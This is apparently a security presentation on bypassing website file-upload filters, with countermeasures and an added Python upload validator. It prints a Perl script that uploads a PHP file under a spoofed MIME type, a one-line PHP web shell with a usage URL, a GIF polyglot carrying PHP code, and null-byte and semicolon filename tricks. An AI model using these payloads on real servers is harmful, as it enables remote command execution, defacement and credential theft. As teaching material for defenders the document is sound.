BYPASS FILE UPLOAD RESTRICTIONS ON WEBSITES AND SECURITY MEASURES
By K. Subramanian K. R. Mukesh
File upload
• Necessity
• Social networking websites, blogs, file sharing, etc.
• Web developers do not consider the threats
• Files should be sanitized
• If not, leads to local file inclusion and hacking
• Filtering mechanisms
Methods of filtering
Content-Type verification
• HTTP POST – MIME type
  Content-Disposition: form-data; name="uploaded file []"; filename="18.jpg"\r\n
  Content-Type: image/jpeg\r\n\r\n
  <file content>
• To bypass this filter, edit the Content-Type to an applicable one.
#!/usr/bin/perl
use LWP;
use HTTP::Request::Common;
$ua = LWP::UserAgent->new;
$req = $ua->request(POST 'http://example.com/upload.PHP',
    Content_Type => 'form-data',
    Content => [userfile => ["sh.PHP", "sh.PHP", "Content-Type" => "application/pdf"]],
);
print $req->as_string();
An easy way – Tamper data
• Tamper Data – Mozilla add-on that allows modifying the POST data before it is submitted
Filename extension verification
• Check the extension of the file
• Filter out malicious extensions
$blacklist = array(".php", ".phtml", ".php3", ".php4");
• To bypass this, use NULL BYTES in the filename: sh.php%00.pdf
  (or) sh.asp;xx.pdf
• While uploading, the extension is .pdf
• When accessed, delivered to the PHP interpreter
File content verification
• Applicable to image files
• $imageinfo = getimagesize($_FILES['userfile']['tmp_name']);
• To bypass this, manually craft an image file with embedded PHP code
Content-Type: image/gif
GIF89a(...some binary data...)<?PHP System($_GET['command']); ?>(...binary data...)
• The PHP interpreter executes the PHP code inside the garbage of binary values
A Simple Demonstration
Towards Bypassing these Filters
Worst case scenario
• Local file inclusion – PHP shell upload
• Simple PHP shell:
<?php System($_GET['command']); ?>
• Executes commands on the remote server
  www.example.com/uploads/sh.php?command='ifconfig'
• Entire control of the server – rooting it
• Defacements, database access, credential information theft, etc.
Security Measures
• Preventing direct access to the uploaded files
  $uploaddir = '/var/spool/uploads/';  # Outside of web root
• Block web access using a .htaccess file
  IndexIgnore */*
• Overhead to read and write
• Sometimes leads to potential directory traversal attacks
Random file name implementation
• Prevents attacker knowing the name of the file uploaded
• Map the names in the database
  $res = $db->query("INSERT INTO uploads SET name=?, original_name=?");
• Query while reading
• A little overhead, but secure
• Think again, leads to SQL injection
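As an added example that is not part of the deck, the following Python validator applies the measures above together: an allowlist checked against the whole filename (so sh.php%00.pdf, sh.asp;xx.pdf and sh.php.pdf are all rejected), a magic-bytes check that ignores the client-sent Content-Type, a scan for script markers inside image bodies (the GIF89a trick), and a random on-disk name. The policy table, marker list and sample inputs are constructed for this example.

```python
import os
import re
import secrets
from typing import Tuple

# Constructed policy: allowlisted extensions and the magic bytes each must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
# Markers that betray server-side code smuggled into an otherwise valid image body.
CODE_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")
# name.ext only: no '%', ';', '/', '\\', second dot or control bytes, so the null-byte
# and semicolon tricks from the deck never reach the extension check.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+")

def validate_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). The client-declared Content-Type is deliberately ignored."""
    base = os.path.basename(filename.replace("\\", "/"))  # drop any path component
    if "\x00" in base or not SAFE_NAME.fullmatch(base):
        return False, "filename must be name.ext with one extension and safe characters"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return False, f"extension '{ext}' not allowlisted"
    if not content.startswith(ALLOWED[ext]):
        return False, f"content does not start with the magic bytes for .{ext}"
    if any(marker in content.lower() for marker in CODE_MARKERS):
        return False, "script marker found inside file body"
    return True, "ok"

def stored_name(ext: str) -> str:
    """Random on-disk name; keep the original name only in the database (parameterised INSERT)."""
    return f"{secrets.token_hex(16)}.{ext.lower()}"

if __name__ == "__main__":
    # Constructed samples mirroring the tricks in the deck.
    samples = {
        "photo.gif": b"GIF89a" + bytes(32),
        "sh.php%00.pdf": b"%PDF-1.4 fake",
        "sh.asp;xx.pdf": b"%PDF-1.4 fake",
        "sh.php": b"<?php System($_GET['command']); ?>",
        "poly.gif": b"GIF89a" + bytes(8) + b"<?PHP System($_GET['command']); ?>",
    }
    for name, data in samples.items():
        ok, why = validate_upload(name, data)
        print(f"{name:16} {'accept as ' + stored_name(name.rsplit('.', 1)[1]) if ok else 'reject: ' + why}")
```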
Conclusion
• Complicated to implement a secure file upload facility
• Many filters = slow response. Leads to Denial Of Service (DOS) attacks
• Best way is to maintain UPLOAD LOGS containing user info such as the IP address, helpful to trace an attacker
• Secure coding practices
Thank you